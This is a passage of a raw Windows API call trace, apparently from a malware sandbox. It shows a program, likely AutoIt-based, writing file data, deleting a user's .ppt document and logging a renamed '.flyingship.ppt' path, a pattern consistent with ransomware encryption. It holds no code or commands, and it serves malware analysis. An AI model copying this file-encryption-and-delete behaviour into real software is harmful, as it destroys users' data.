hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0172.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0172.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0172.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0172.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0172.065] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0172.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0172.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0172.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0172.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0172.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0172.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0172.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0172.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0172.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0172.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0172.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0172.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0172.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0172.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0172.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0172.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0172.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0172.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0172.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0172.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0172.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0172.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0172.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0172.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0172.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0172.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0172.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0172.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0172.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0172.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0172.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.067] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0172.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9b9b50, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0172.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0172.068] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0172.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0172.068] WriteFile (in: hFile=0x138, lpBuffer=0x9c5180*, nNumberOfBytesToWrite=0x6db5, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesWritten=0x87eae0*=0x6db5, lpOverlapped=0x0) returned 1 [0172.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0172.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0172.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0172.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0172.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0172.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0172.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0172.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0172.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0172.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0172.069] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0172.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0172.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0172.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0172.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0172.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0172.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0172.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0172.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0172.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0172.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0172.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0172.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0172.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0172.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.070] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.070] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.070] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.070] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.070] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0172.071] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.071] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.071] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.072] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.073] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.073] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.073] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.073] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt", lpFilePart=0x0) returned 0x4f [0172.074] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6f89b0, ftCreationTime.dwHighDateTime=0x1d5e748, ftLastAccessTime.dwLowDateTime=0xd1d81f90, ftLastAccessTime.dwHighDateTime=0x1d5d846, ftLastWriteTime.dwLowDateTime=0xbeaa580, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x6db5, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="gVll7Y--hWx_Sucb_5p.ppt", cAlternateFileName="GVLL7Y~1.PPT")) returned 0x90ae18 [0172.075] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\gvll7y--hwx_sucb_5p.ppt")) returned 1 [0172.079] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6f89b0, ftCreationTime.dwHighDateTime=0x1d5e748, ftLastAccessTime.dwLowDateTime=0xd1d81f90, ftLastAccessTime.dwHighDateTime=0x1d5d846, ftLastWriteTime.dwLowDateTime=0xbeaa580, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x6db5, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="gVll7Y--hWx_Sucb_5p.ppt", cAlternateFileName="GVLL7Y~1.PPT")) returned 0 [0172.079] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0172.079] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.080] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.080] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0172.080] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0172.080] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0172.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0172.080] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0172.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0172.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.081] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0172.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0172.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0172.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0172.081] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0172.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0172.081] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0172.081] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.081] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0172.081] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.081] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0172.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0172.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.082] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0172.082] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0xfd2, lpOverlapped=0x0) returned 1 [0172.082] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0172.082] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0xfd2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.082] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0172.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0172.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0172.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.flyingship.ppt\r\n", cchWideChar=93, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0172.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5d) returned 0x9a5d10 [0172.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.flyingship.ppt\r\n", cchWideChar=93, lpMultiByteStr=0x9a5d10, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.flyingship.ppt\r\n", lpUsedDefaultChar=0x0) returned 93 [0172.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0172.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0172.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0172.083] WriteFile (in: hFile=0x138, lpBuffer=0x9a5d78*, nNumberOfBytesToWrite=0x5c, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d78*, lpNumberOfBytesWritten=0x87f43c*=0x5c, lpOverlapped=0x0) returned 1 [0172.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0172.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.083] CloseHandle (hObject=0x138) returned 1 [0172.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0172.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0172.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0172.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0172.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0172.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0172.085] HeapFree (in: hHeap=0x8a0000, 